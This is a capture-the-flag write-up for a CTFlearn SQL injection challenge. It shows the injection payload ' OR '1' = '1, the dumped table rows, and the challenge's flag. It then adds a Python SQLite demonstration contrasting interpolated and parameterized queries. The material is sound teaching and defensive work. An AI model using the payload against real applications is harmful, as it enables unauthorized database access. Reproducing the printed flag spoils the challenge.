See if you can leak the whole database using what you know about SQL Injections.
Don’t know where to begin? Check out CTFlearn’s SQL Injection Lab
Solution:
Original Query: SELECT * FROM webfour.webfour where name = '$input'
The input isn't sanitized, so you can get all the data from the table by first closing the open string literal in the query with a single quote '
and then adding an OR condition with an always-true statement such as '1'='1'.
In this case you can do it as ' OR '1' = '1
You don't need a trailing ' because the original query already supplies the closing quote.
Original Query: SELECT * FROM webfour.webfour where name = '$input'
Your Resulting Query: SELECT * FROM webfour.webfour where name = '' OR '1' = '1'
Name: Luke
Data: I made this problem.
Name: Alec
Data: Steam boys.
Name: Jalen
Data: Pump that iron fool.
Name: Eric
Data: I make cars.
Name: Sam
Data: Thinks he knows SQL.
Name: fl4g__giv3r
Data: CTFlearn{th4t_is_why_you_n33d_to_sanitiz3_inputs}
Name: snoutpop
Data: jowls
Name: Chunbucket
Data: @datboiiii
And there’s the flag.
Flag: CTFlearn{th4t_is_why_you_n33d_to_sanitiz3_inputs}
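To show concretely why the query breaks and what the fix looks like, here is an added example (not part of the original writeup or of CTFlearn's challenge code). It rebuilds the table in an in-memory SQLite database using the names and data shown above, then runs the same lookup two ways: the vulnerable version splices the input into the SQL text exactly as the challenge does, and the safe version passes the input as a bound parameter. The table name `webfour` (without the `webfour.` schema prefix) and the column names `name` and `data` are assumptions for the sake of a runnable example.

```python
import sqlite3

# Constructed copy of the rows the challenge returns (taken from the writeup output above).
ROWS = [
    ("Luke", "I made this problem."),
    ("Alec", "Steam boys."),
    ("Jalen", "Pump that iron fool."),
    ("Eric", "I make cars."),
    ("Sam", "Thinks he knows SQL."),
    ("fl4g__giv3r", "CTFlearn{th4t_is_why_you_n33d_to_sanitiz3_inputs}"),
    ("snoutpop", "jowls"),
    ("Chunbucket", "@datboiiii"),
]

# The payload from the writeup: closes the string literal, then adds an always-true OR.
PAYLOAD = "' OR '1' = '1"


def make_db():
    """Create an in-memory table mirroring the challenge's webfour table (schema is assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE webfour (name TEXT, data TEXT)")
    conn.executemany("INSERT INTO webfour VALUES (?, ?)", ROWS)
    conn.commit()
    return conn


def build_vulnerable_query(user_input):
    """Build the SQL text the way the challenge does: raw string interpolation."""
    return f"SELECT * FROM webfour WHERE name = '{user_input}'"


def lookup_vulnerable(conn, user_input):
    """Vulnerable lookup: the input becomes part of the SQL grammar, so quotes change the query."""
    return conn.execute(build_vulnerable_query(user_input)).fetchall()


def lookup_safe(conn, user_input):
    """Safe lookup: the value is bound as a parameter and is never parsed as SQL.

    The same payload is now just a (non-matching) name string, so no rows come back.
    """
    return conn.execute(
        "SELECT * FROM webfour WHERE name = ?", (user_input,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("Resulting query:", build_vulnerable_query(PAYLOAD))
    print("Vulnerable lookup returned", len(lookup_vulnerable(db, PAYLOAD)), "rows")
    print("Safe lookup returned", len(lookup_safe(db, PAYLOAD)), "rows")
    print("Safe lookup for a real name:", lookup_safe(db, "Luke"))
```

Running this prints the exact "Resulting Query" string from the writeup, dumps all eight rows through the vulnerable path, and returns nothing through the parameterized path. The fix is not quote-escaping by hand but keeping data and SQL text separate, which is what bound parameters do for every database driver.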